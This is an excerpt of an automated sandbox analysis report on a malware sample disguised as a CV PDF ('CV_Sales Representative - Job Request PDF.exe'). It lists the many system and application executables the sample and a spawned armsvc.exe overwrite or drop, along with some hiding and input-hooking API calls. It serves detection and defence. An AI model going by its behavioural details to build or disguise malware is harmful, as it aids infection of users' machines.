            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\sppsvc.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\sppsvc.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Creates files inside the volume driver (system volume information)
            Source: C:\Windows\System32\TieringEngineService.exeFile created: C:\System Volume Information\Heat\
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00485376
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00423187
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
